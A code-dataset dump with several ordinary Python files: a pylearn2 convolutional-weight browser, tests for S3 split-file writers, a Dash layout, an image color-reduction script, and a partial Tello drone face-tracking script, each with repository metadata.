_parse_args():\n parser = argparse.ArgumentParser(\n description=(\"Interactive browser of convolutional weights. \"\n \"Up/down keys switch layers. \"\n \"Left/right keys switch units.\"))\n\n parser.add_argument('-i',\n '--input',\n required=True,\n help=\".pkl file of model\")\n\n result = parser.parse_args()\n\n if os.path.splitext(result.input)[1] != '.pkl':\n print(\"Expected --input to end in .pkl, got %s.\" % result.input)\n sys.exit(1)\n\n return result\n\n\ndef _get_conv_layers(layer, result=None):\n '''\n Returns a list of the convolutional layers in a model.\n\n Returns\n -------\n rval: list\n Lists the convolutional layers (ConvElemwise, MaxoutConvC01B).\n '''\n\n if result is None:\n result = []\n\n if isinstance(layer, (MLP, CompositeLayer)):\n for sub_layer in layer.layers:\n _get_conv_layers(sub_layer, result)\n elif isinstance(layer, (MaxoutConvC01B, ConvElemwise)):\n result.append(layer)\n\n return result\n\n\ndef _get_conv_weights_bc01(layer):\n '''\n Returns a conv. layer's weights in BC01 format.\n\n Parameters\n ----------\n layer: MaxoutConvC01B or ConvElemwise\n\n Returns\n -------\n rval: numpy.ndarray\n The kernel weights in BC01 axis order. (B: output channels, C: input\n channels)\n '''\n\n assert isinstance(layer, (MaxoutConvC01B, ConvElemwise))\n weights = layer.get_params()[0].get_value()\n\n if isinstance(layer, MaxoutConvC01B):\n c01b = Conv2DSpace(shape=weights.shape[1:3],\n num_channels=weights.shape[0],\n axes=('c', 0, 1, 'b'))\n\n bc01 = Conv2DSpace(shape=c01b.shape,\n num_channels=c01b.num_channels,\n axes=('b', 'c', 0, 1))\n\n weights = c01b.np_format_as(weights, bc01)\n elif isinstance(layer, ConvElemwise):\n weights = weights[:, :, ::-1, ::-1] # reverse 0, 1 axes\n\n return weights\n\n\ndef _num_conv_units(conv_layer):\n '''\n Returns a conv layer's number of output channels.\n '''\n\n assert isinstance(conv_layer, (MaxoutConvC01B, ConvElemwise))\n\n weights = conv_layer.get_params()[0].get_value()\n\n if isinstance(conv_layer, MaxoutConvC01B):\n return weights.shape[-1]\n elif isinstance(conv_layer, ConvElemwise):\n return weights.shape[0]\n\n\ndef main():\n \"Entry point of script.\"\n\n args = _parse_args()\n\n model = serial.load(args.input)\n if not isinstance(model, MLP):\n print(\"Expected the .pkl file to contain an MLP, got a %s.\" %\n str(model.type))\n sys.exit(1)\n\n def get_figure_and_axes(conv_layers, window_width=800):\n kernel_display_width = 20\n margin = 5\n grid_square_width = kernel_display_width + margin\n num_columns = window_width // grid_square_width\n\n max_num_channels = numpy.max([layer.get_input_space().num_channels\n for layer in conv_layers])\n # pdb.set_trace()\n num_rows = max_num_channels // num_columns\n if num_rows * num_columns < max_num_channels:\n num_rows += 1\n\n assert num_rows * num_columns >= max_num_channels\n\n window_width = 15\n\n # '* 1.8' comse from the fact that rows take up about 1.8 times as much\n # space as columns, due to the title text.\n window_height = window_width * ((num_rows * 1.8) / num_columns)\n figure, all_axes = pyplot.subplots(num_rows,\n num_columns,\n squeeze=False,\n figsize=(window_width,\n window_height))\n\n for unit_index, axes in enumerate(all_axes.flat):\n subplot_title = axes.set_title('%d' % unit_index)\n subplot_title.set_size(8)\n subplot_title.set_color((.3, .3, .3))\n\n # Hides tickmarks\n for axes_row in all_axes:\n for axes in axes_row:\n axes.get_xaxis().set_visible(False)\n axes.get_yaxis().set_visible(False)\n\n return figure, all_axes\n\n conv_layers = _get_conv_layers(model)\n figure, all_axes = get_figure_and_axes(conv_layers)\n title_text = figure.suptitle(\"title\")\n pyplot.tight_layout(h_pad=.1, w_pad=.5) # in inches\n\n layer_index = numpy.array(0)\n unit_indices = numpy.zeros(len(model.layers), dtype=int)\n\n def redraw():\n '''\n Draws the currently selected convolutional kernel.\n '''\n\n axes_list = all_axes.flatten()\n layer = conv_layers[layer_index]\n unit_index = unit_indices[layer_index, ...]\n weights = _get_conv_weights_bc01(layer)[unit_index, ...]\n\n active_axes = axes_list[:weights.shape[0]]\n\n for axes, weights in safe_zip(active_axes, weights):\n axes.set_visible(True)\n axes.imshow(weights, cmap='gray', interpolation='nearest')\n\n assert len(frozenset(active_axes)) == len(active_axes)\n\n unused_axes = axes_list[len(active_axes):]\n assert len(frozenset(unused_axes)) == len(unused_axes)\n assert len(axes_list) == len(active_axes) + len(unused_axes)\n\n for axes in unused_axes:\n axes.set_visible(False)\n\n title_text.set_text(\"Layer %s, unit %d\" %\n (layer.layer_name,\n unit_indices[layer_index]))\n\n figure.canvas.draw()\n\n def on_key_press(event):\n \"Callback for key press events\"\n\n def increment(index, size, step):\n \"\"\"\n Increments an index in-place.\n\n Parameters\n ----------\n index: numpy.ndarray\n scalar (0-dim array) of dtype=int. Non-negative.\n\n size: int\n One more than the maximum permissible index.\n\n step: int\n -1, 0, or 1.\n \"\"\"\n assert index >= 0\n assert step in (0, -1, 1)\n\n index[...] = (index + size + step) % size\n\n if event.key in ('up', 'down'):\n increment(layer_index,\n len(conv_layers),\n 1 if event.key == 'up' else -1)\n unit_index = unit_indices[layer_index]\n redraw()\n elif event.key in ('right', 'left'):\n unit_index = unit_indices[layer_index:layer_index + 1]\n increment(unit_index,\n _num_conv_units(conv_layers[layer_index]),\n 1 if event.key == 'right' else -1)\n redraw()\n elif event.key == 'q':\n sys.exit(0)\n\n figure.canvas.mpl_connect('key_press_event', on_key_press)\n redraw()\n pyplot.show()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "lisa-lab/pylearn2", "sub_path": "pylearn2/scripts/browse_conv_weights.py", "file_name": "browse_conv_weights.py", "file_ext": "py", "file_size_in_byte": 7605, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2743, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.warn", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 43, "usage_type": "call"}, {"api_name": "pylearn2.models.mlp.MLP", "line_number": 61, "usage_type": "name"}, {"api_name": "pylearn2.models.mlp.CompositeLayer", "line_number": 61, "usage_type": "name"}, {"api_name": "pylearn2.models.maxout.MaxoutConvC01B", "line_number": 64, "usage_type": "name"}, {"api_name": "pylearn2.models.mlp.ConvElemwise", "line_number": 64, "usage_type": "name"}, {"api_name": "pylearn2.models.maxout.MaxoutConvC01B", "line_number": 85, "usage_type": "name"}, {"api_name": "pylearn2.models.mlp.ConvElemwise", "line_number": 85, "usage_type": "name"}, {"api_name": "pylearn2.models.maxout.MaxoutConvC01B", "line_number": 88, "usage_type": "argument"}, {"api_name": "pylearn2.space.Conv2DSpace", "line_number": 89, "usage_type": "call"}, {"api_name": "pylearn2.space.Conv2DSpace", "line_number": 93, "usage_type": "call"}, {"api_name": "pylearn2.models.mlp.ConvElemwise", "line_number": 98, "usage_type": "argument"}, {"api_name": "pylearn2.models.maxout.MaxoutConvC01B", "line_number": 109, "usage_type": "name"}, {"api_name": "pylearn2.models.mlp.ConvElemwise", "line_number": 109, "usage_type": "name"}, {"api_name": "pylearn2.models.maxout.MaxoutConvC01B", "line_number": 113, "usage_type": "argument"}, {"api_name": "pylearn2.models.mlp.ConvElemwise", "line_number": 115, "usage_type": "argument"}, {"api_name": "pylearn2.utils.serial.load", "line_number": 124, "usage_type": "call"}, {"api_name": "pylearn2.utils.serial", "line_number": 124, "usage_type": "name"}, {"api_name": "pylearn2.models.mlp.MLP", "line_number": 125, "usage_type": "argument"}, {"api_name": "sys.exit", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 175, "usage_type": "call"}, {"api_name": "pylearn2.utils.safe_zip", "line_number": 189, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 244, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 248, "usage_type": "name"}]} +{"seq_id": "70090084647", "text": "import sys\nimport gzip\n\nimport pytest\nimport csv\nfrom io import StringIO, BytesIO\n\nfrom dataengineeringutils3.s3 import gzip_string_write_to_s3\nfrom dataengineeringutils3.writer import (\n BytesSplitFileWriter,\n StringSplitFileWriter,\n JsonNlSplitFileWriter,\n)\nfrom tests.helpers import time_func\n\nimport jsonlines\n\n\n@pytest.mark.parametrize(\n \"max_bytes,chunk_size,expected_num\",\n [(1024, None, 5), (100000000000, 50, 3), (100000000000, None, 1)],\n)\ndef test_json_split_file_writer(s3, max_bytes, chunk_size, expected_num):\n \"\"\"Test Writer splits files, gzips and sends to s3\"\"\"\n file_key = \"test-key\"\n bucket_name = \"test\"\n s3_basepath = f\"s3://{bucket_name}/\"\n\n s3.meta.client.create_bucket(\n Bucket=bucket_name,\n CreateBucketConfiguration={\"LocationConstraint\": \"eu-west-1\"},\n )\n bucket = s3.Bucket(bucket_name)\n with JsonNlSplitFileWriter(s3_basepath, file_key, max_bytes, chunk_size) as writer:\n for i in range(150):\n writer.write_line(f\"{i}. This test line number {i + 1}\")\n\n assert writer.total_lines == 150\n keys_in_bucket = [f\"s3://{bucket_name}/{o.key}\" for o in bucket.objects.all()]\n files_in_bucket = len(keys_in_bucket)\n assert files_in_bucket == expected_num\n assert files_in_bucket == writer.num_files\n\n assert keys_in_bucket == [\n f\"{s3_basepath}{file_key}-{i}.jsonl.gz\" for i in range(files_in_bucket)\n ]\n\n\nMAX_BYTES = 80000\nCHUNK_SIZE = 1000\n\n\ndef write_with_writer(result_set):\n with JsonNlSplitFileWriter(\n \"s3://test/\", \"test-file\", MAX_BYTES, CHUNK_SIZE\n ) as writer:\n writer.write_lines(result_set)\n\n\ndef write_manually(result_set):\n string = \"\"\n num_files = 0\n num_lines = 0\n while True:\n for line in result_set:\n string += f\"{line}\"\n if not num_lines % CHUNK_SIZE and sys.getsizeof(string) > MAX_BYTES:\n gzip_string_write_to_s3(\n string, f\"s3://test/test-file-two-{num_files}.jsonl.gz\"\n )\n num_files += 1\n num_lines = 0\n string = \"\"\n num_lines += 1\n break\n if string:\n gzip_string_write_to_s3(string, f\"s3://test/test-file-two-{num_files}.josnl.gz\")\n\n\ndef test_speed_of_writer(result_set, s3):\n \"\"\"\n Test that generator is not much slower than a flat list\n \"\"\"\n s3.meta.client.create_bucket(\n Bucket=\"test\", CreateBucketConfiguration={\"LocationConstraint\": \"eu-west-1\"}\n )\n\n range_time = time_func(write_manually, result_set)\n\n qs_time = time_func(write_with_writer, result_set)\n\n assert qs_time < range_time\n\n\n@pytest.mark.parametrize(\n \"folder,filename,compress\", [(\"test-csv/\", \"test-file\", False), (\"\", \"a\", True)]\n)\ndef test_with_csv_string_split_file_writer(s3, folder, filename, compress):\n \"\"\"Test string writer with statement csv\"\"\"\n bucket_name = \"test\"\n s3.meta.client.create_bucket(\n Bucket=bucket_name,\n CreateBucketConfiguration={\"LocationConstraint\": \"eu-west-1\"},\n )\n\n csv_data = [\n (\"i\", \"x1\", \"x2\"),\n (1, \"a\", \"b\"),\n (2, \"a\", \"b\"),\n (3, \"a\", \"b\"),\n (4, \"a\", \"b\"),\n (5, \"a\", \"b\"),\n (6, \"a\", \"b\"),\n (7, \"a\", \"b\"),\n ]\n\n expected_file = StringIO()\n e_csv_writer = csv.writer(expected_file)\n\n ext = \"csv.gz\" if compress else \"csv\"\n\n # Test using with statement\n with StringSplitFileWriter(\n f\"s3://{bucket_name}/{folder}\",\n filename,\n max_bytes=30,\n compress_on_upload=compress,\n file_extension=ext,\n ) as f:\n csv_writer = csv.writer(f)\n for row in csv_data:\n csv_writer.writerow(row)\n e_csv_writer.writerow(row)\n\n actual_s3_objects = sorted([o.key for o in s3.Bucket(bucket_name).objects.all()])\n\n # Test files written to s3\n expected_s3_objects = [f\"{folder}{filename}-0.{ext}\", f\"{folder}{filename}-1.{ext}\"]\n assert expected_s3_objects == actual_s3_objects\n\n expected = expected_file.getvalue()\n\n # Test file contents\n actual = \"\"\n for expeceted_object in expected_s3_objects:\n file_object = BytesIO()\n s3.Object(bucket_name, expeceted_object).download_fileobj(file_object)\n if compress:\n actual += gzip.decompress(file_object.getvalue()).decode(\"utf-8\")\n else:\n actual += file_object.getvalue().decode(\"utf-8\")\n file_object.close()\n\n assert actual == expected\n\n\n@pytest.mark.parametrize(\n \"folder,filename,compress\", [(\"test-csv/\", \"test-file\", False), (\"\", \"a\", True)]\n)\ndef test_csv_string_split_file_writer(s3, folder, filename, compress):\n \"\"\"Test string writer csv\"\"\"\n bucket_name = \"test\"\n s3.meta.client.create_bucket(\n Bucket=bucket_name,\n CreateBucketConfiguration={\"LocationConstraint\": \"eu-west-1\"},\n )\n\n csv_data = [\n (\"i\", \"x1\", \"x2\"),\n (1, \"a\", \"b\"),\n (2, \"a\", \"b\"),\n (3, \"a\", \"b\"),\n (4, \"a\", \"b\"),\n (5, \"a\", \"b\"),\n (6, \"a\", \"b\"),\n (7, \"a\", \"b\"),\n ]\n\n expected_file = StringIO()\n e_csv_writer = csv.writer(expected_file)\n\n ext = \"csv.gz\" if compress else \"csv\"\n\n # Test using with statement\n f = StringSplitFileWriter(\n f\"s3://{bucket_name}/{folder}\",\n filename,\n max_bytes=30,\n compress_on_upload=compress,\n file_extension=ext,\n )\n csv_writer = csv.writer(f)\n for row in csv_data:\n csv_writer.writerow(row)\n e_csv_writer.writerow(row)\n f.close()\n\n actual_s3_objects = sorted([o.key for o in s3.Bucket(bucket_name).objects.all()])\n\n # Test files written to s3\n expected_s3_objects = [f\"{folder}{filename}-0.{ext}\", f\"{folder}{filename}-1.{ext}\"]\n assert expected_s3_objects == actual_s3_objects\n\n # Test file contents\n expected = expected_file.getvalue()\n actual = \"\"\n for expeceted_object in expected_s3_objects:\n file_object = BytesIO()\n s3.Object(bucket_name, expeceted_object).download_fileobj(file_object)\n if compress:\n actual += gzip.decompress(file_object.getvalue()).decode(\"utf-8\")\n else:\n actual += file_object.getvalue().decode(\"utf-8\")\n file_object.close()\n\n assert actual == expected\n\n\n@pytest.mark.parametrize(\n \"folder,filename,compress,filewriter_type\",\n [\n (\"test-jsonl/\", \"test-jsonl\", False, \"bytes\"),\n (\"\", \"a\", True, \"bytes\"),\n (\"test-jsonl/\", \"test-jsonl\", False, \"string\"),\n (\"\", \"a\", True, \"string\"),\n ],\n)\ndef test_split_file_writer_with_json(s3, folder, filename, compress, filewriter_type):\n \"\"\"Test jsonline string and bytes writer\"\"\"\n\n bucket_name = \"test\"\n ext = \"jsonl.gz\" if compress else \"jsonl\"\n\n s3.meta.client.create_bucket(\n Bucket=bucket_name,\n CreateBucketConfiguration={\"LocationConstraint\": \"eu-west-1\"},\n )\n\n jsonl_data = [\n {\"i\": 1, \"x1\": \"a\", \"x2\": \"b\"},\n {\"i\": 2, \"x1\": \"a\", \"x2\": \"b\"},\n {\"i\": 3, \"x1\": \"a\", \"x2\": \"b\"},\n {\"i\": 4, \"x1\": \"a\", \"x2\": \"b\"},\n {\"i\": 5, \"x1\": \"a\", \"x2\": \"b\"},\n ]\n\n if filewriter_type == \"string\":\n f = StringSplitFileWriter(\n f\"s3://{bucket_name}/{folder}\",\n filename,\n max_bytes=60,\n compress_on_upload=compress,\n file_extension=ext,\n )\n\n elif filewriter_type == \"bytes\":\n f = BytesSplitFileWriter(\n f\"s3://{bucket_name}/{folder}\",\n filename,\n max_bytes=60,\n compress_on_upload=compress,\n file_extension=ext,\n )\n\n else:\n raise ValueError(\"Input filewriter_type must be either 'string' or 'bytes'\")\n\n # Write data\n j_writer = jsonlines.Writer(f)\n\n expected_file = StringIO()\n e_j_writer = jsonlines.Writer(expected_file)\n\n for row in jsonl_data:\n j_writer.write(row)\n e_j_writer.write(row)\n f.close()\n\n actual_s3_objects = sorted([o.key for o in s3.Bucket(bucket_name).objects.all()])\n\n # Test files written to s3\n expected_s3_objects = [\n f\"{folder}{filename}-0.{ext}\",\n f\"{folder}{filename}-1.{ext}\",\n f\"{folder}{filename}-2.{ext}\",\n ]\n assert expected_s3_objects == actual_s3_objects\n\n # Test file contents\n expected = expected_file.getvalue()\n actual = \"\"\n for expeceted_object in expected_s3_objects:\n file_object = BytesIO()\n s3.Object(bucket_name, expeceted_object).download_fileobj(file_object)\n if compress:\n actual += gzip.decompress(file_object.getvalue()).decode(\"utf-8\")\n else:\n actual += file_object.getvalue().decode(\"utf-8\")\n file_object.close()\n\n assert actual == expected\n", "repo_name": "moj-analytical-services/dataengineeringutils3", "sub_path": "tests/test_writer.py", "file_name": "test_writer.py", "file_ext": "py", "file_size_in_byte": 8749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dataengineeringutils3.writer.JsonNlSplitFileWriter", "line_number": 34, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 19, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 19, "usage_type": "attribute"}, {"api_name": "dataengineeringutils3.writer.JsonNlSplitFileWriter", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.getsizeof", "line_number": 67, "usage_type": "call"}, {"api_name": "dataengineeringutils3.s3.gzip_string_write_to_s3", "line_number": 68, "usage_type": "call"}, {"api_name": "dataengineeringutils3.s3.gzip_string_write_to_s3", "line_number": 77, "usage_type": "call"}, {"api_name": "tests.helpers.time_func", "line_number": 88, "usage_type": "call"}, {"api_name": "tests.helpers.time_func", "line_number": 90, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 117, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 118, "usage_type": "call"}, {"api_name": "dataengineeringutils3.writer.StringSplitFileWriter", "line_number": 123, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 130, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 146, "usage_type": "call"}, {"api_name": "gzip.decompress", "line_number": 149, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 95, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 95, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 179, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 180, "usage_type": "call"}, {"api_name": "dataengineeringutils3.writer.StringSplitFileWriter", "line_number": 185, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 192, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 208, "usage_type": "call"}, {"api_name": "gzip.decompress", "line_number": 211, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 157, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 157, "usage_type": "attribute"}, {"api_name": "dataengineeringutils3.writer.StringSplitFileWriter", "line_number": 248, "usage_type": "call"}, {"api_name": "dataengineeringutils3.writer.BytesSplitFileWriter", "line_number": 257, "usage_type": "call"}, {"api_name": "jsonlines.Writer", "line_number": 269, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 271, "usage_type": "call"}, {"api_name": "jsonlines.Writer", "line_number": 272, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 293, "usage_type": "call"}, {"api_name": "gzip.decompress", "line_number": 296, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 219, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 219, "usage_type": "attribute"}]} +{"seq_id": "11895291614", "text": "import dash_bootstrap_components as dbc\nfrom dash import html\n\nleft_jumbotron = dbc.Col(\n html.Div(\n [\n html.H2(\"404: Rojus nerastas\", className=\"display-3\"),\n html.Hr(className=\"my-2\"),\n html.P(f\"The pathname /gallery/jumbotron was not recognised...\"),\n dbc.Button(\"Example Button\", color=\"light\", outline=True),\n ],\n className=\"h-100 p-5 text-white bg-dark rounded-3\",\n ),\n md=6,\n)\n\nright_jumbotron = dbc.Col(\n html.Div(\n [\n html.H2(\"404: Rojus nerastas\", className=\"display-3\"),\n html.Hr(className=\"my-2\"),\n html.P(f\"The pathname /gallery/jumbotron was not recognised...\"),\n dbc.Button(\"Example Button\", color=\"secondary\", outline=True),\n ],\n className=\"h-100 p-5 bg-light border rounded-3\",\n ),\n md=6,\n)\n\ncontent = dbc.Row([left_jumbotron, right_jumbotron], className=\"align-items-md-stretch\")\n", "repo_name": "loijord/sqrtmath", "sub_path": "gallery/jumbotron.py", "file_name": "jumbotron.py", "file_ext": "py", "file_size_in_byte": 946, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dash_bootstrap_components.Col", "line_number": 4, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 5, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 5, "usage_type": "name"}, {"api_name": "dash.html.H2", "line_number": 7, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 7, "usage_type": "name"}, {"api_name": "dash.html.Hr", "line_number": 8, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 8, "usage_type": "name"}, {"api_name": "dash.html.P", "line_number": 9, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 9, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 10, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 17, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 18, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 18, "usage_type": "name"}, {"api_name": "dash.html.H2", "line_number": 20, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 20, "usage_type": "name"}, {"api_name": "dash.html.Hr", "line_number": 21, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 21, "usage_type": "name"}, {"api_name": "dash.html.P", "line_number": 22, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 22, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 23, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "39792689810", "text": "import cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom PIL import Image\n\n\ndef draw_histograms(image, image_file):\n histogram_red = cv2.calcHist([image], [0], None, [256], [0, 256])\n histogram_green = cv2.calcHist([image], [1], None, [256], [0, 256])\n histogram_blue = cv2.calcHist([image], [2], None, [256], [0, 256])\n\n plt.plot(histogram_red, color='red')\n plt.plot(histogram_green, color='green')\n plt.plot(histogram_blue, color='blue')\n plt.legend(('Red', 'Green', 'Blue'), loc='upper right')\n plt.show()\n\n red_heads = get_heads_color(histogram_red, 3)\n green_heads = get_heads_color(histogram_green, 3)\n blue_heads = get_heads_color(histogram_blue, 2)\n\n reduce_colors(red_heads, green_heads, blue_heads, image_file)\n\n\ndef get_heads_color(numbers, level):\n splits_part = []\n split_recursive(splits_part, numbers, level, 0, len(numbers))\n head_colors = []\n for index, item in enumerate(splits_part):\n index_start = 0\n for i in range(0, index):\n index_start += len(splits_part[i])\n avg = get_average(splits_part[index], index_start)\n head_colors.append(avg)\n return head_colors\n\n\ndef split_recursive(splits, numbers, level, index_start, index_end):\n if level == 0:\n splits.append(numbers[index_start:index_end])\n return\n else:\n split_index = get_median_index(numbers[index_start:index_end])\n split_index += index_start\n level -= 1\n split_recursive(splits, numbers, level, index_start, split_index)\n split_recursive(splits, numbers, level, split_index, index_end)\n\n\ndef get_median_index(numbers):\n differences = []\n for i in range(1, len(numbers)):\n left = np.sum(numbers[0:i])\n right = np.sum(numbers[i:len(numbers)])\n differences.append(abs(left - right))\n min_index = differences.index(min(differences))\n return min_index\n\n\ndef get_average(numbers, start_index):\n sum = 0\n sum_freq = 0\n for index, freq in enumerate(numbers):\n sum += freq*(index + start_index)\n sum_freq += freq\n return int(sum/sum_freq)\n\n\ndef reduce_colors(red_heads, green_heads, blue_heads, image_input):\n new_img = Image.open(image_input)\n new_img = new_img.convert('RGB')\n pixel = new_img.load()\n\n x_lim, y_lim = new_img.size\n\n for y in range(1, y_lim):\n for x in range(1, x_lim):\n red_oldpixel, green_oldpixel, blue_oldpixel = pixel[x, y]\n red_newpixel = find_nearest_value(red_heads, red_oldpixel)\n green_newpixel = find_nearest_value(green_heads, green_oldpixel)\n blue_newpixel = find_nearest_value(blue_heads, blue_oldpixel)\n pixel[x, y] = red_newpixel, green_newpixel, blue_newpixel\n\n new_img.save('../Median_color_reduced.jpg')\n\n\ndef find_nearest_value(palette, color):\n min_err = abs(palette[0] - color)\n best_choice = palette[0]\n for i in range(1, len(palette)):\n new_err = abs(palette[i] - color)\n if new_err < min_err:\n min_err = new_err\n best_choice = palette[i]\n return best_choice\n", "repo_name": "amoazeni75/image-processing-dithering", "sub_path": "Q3.py", "file_name": "Q3.py", "file_ext": "py", "file_size_in_byte": 3118, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.calcHist", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.calcHist", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.calcHist", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}]} +{"seq_id": "10339368773", "text": "from djitellopy import tello\nimport cv2\nimport numpy as np\nimport HandTrackingModule as htm\nimport FaceDetectionModule as fdm\nimport time\n\n\nme = tello.Tello()\nme.connect()\nme.streamon()\nw, h = 320, 240\nfbRange = [6200, 6800]\npid = [0.6, 0.6, 0.4]\ndetector = htm.handDetector(detectionCon=0.7)\ntipIds = [4, 8, 12, 16, 20]\npError = 0\npTime = 0\n\nprint(\"***************************************\")\nprint(\"* Drone Face Tracking Application *\")\nprint(\"* Drone will follow you *\")\nprint(\"* by tracking your face *\")\nprint(\"* - How to Use - *\")\nprint(\"***************************************\")\nprint(\"* Use Hand Sign *\")\nprint(\"* To takeoff,landing,and screenshot *\")\nprint(\"***************************************\")\nprint(\"* For emergency *\")\nprint(\"* - Controls - *\")\nprint(\"* 'e' -- Takeoff *\")\nprint(\"* 'q' -- Landing *\")\nprint(\"* 's' -- Screenshot *\")\nprint(\"* 'x' -- Exit *\")\nprint(\"***************************************\")\nprint(me.get_battery())\ntime.sleep(2)\n\n\ndef findFace(img):\n faceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = faceCascade.detectMultiScale(imgGray,scaleFactor=1.1,\n minNeighbors=10,\n minSize=(64,64),\n flags=cv2.CASCADE_SCALE_IMAGE)\n\n myFaceListC = []\n myFaceListArea = []\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cx = x + w // 2\n cy = y + h // 2\n area = w * h\n cv2.circle(img, (cx, cy), 5, (0, 255, 0), cv2.FILLED)\n myFaceListArea.append(area)\n myFaceListC.append([cx, cy])\n if len(myFaceListArea) != 0:\n i = myFaceListArea.index(max(myFaceListArea))\n return img, [myFaceListC[i], myFaceListArea[i]]\n else:\n return img, [[0, 0], 0]\n\ndef trackFace(me, info, w, pid, pError):\n area = info[1]\n x, y = info[0]\n fb = 0\n\n error = x - w // 2\n speed = pid[0] * error + pid[1] * (error - pError)\n speed = int(np.clip(speed, -100, 100))\n\n # greenzone\n if area > fbRange[0] and area < fbRange[1]:\n fb = 0\n # redzone back\n elif area > fbRange[1] and area != 0:\n fb = -20\n # redzone move\n elif area < fbRange[0] and area != 0:\n fb = 20\n\n if x == 0:\n speed = 0\n error = 0\n\n # print(speed,fb)\n\n me.send_rc_control(0, fb, 0, speed)\n return error\n\n\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nout = cv2.VideoWriter(f\"djitellofacetrack/Data/video/video_{time.strftime('%d-%m-%Y_%I-%M-%S_%p')}\"+'.avi', fourcc, 30.0, (w, h)) #if fast change the value of fps\ntime.sleep(1/30) #if still fast try to chage the value of 1/x\n\nwhile True:\n #face tracking\n img = me.get_frame_read().frame\n img = cv2.resize(img, (w, h))\n out.write(img)\n\n #hand\n img = detector.findHands(img, draw=True)\n lmList = detector.findPosition(img, draw=True)\n if len(lmList) !=0:\n fingers=[]\n\n\n if lmList[tipIds[0]][1] > lmList[tipIds[0]- 1][1]:\n fingers.append(1)\n else:\n fingers.append(0)\n\n for id in range(1,5):\n if lmList[tipIds[id]][2] < lmList[tipIds[id]-2][2]:\n fingers.append(1)\n else:\n 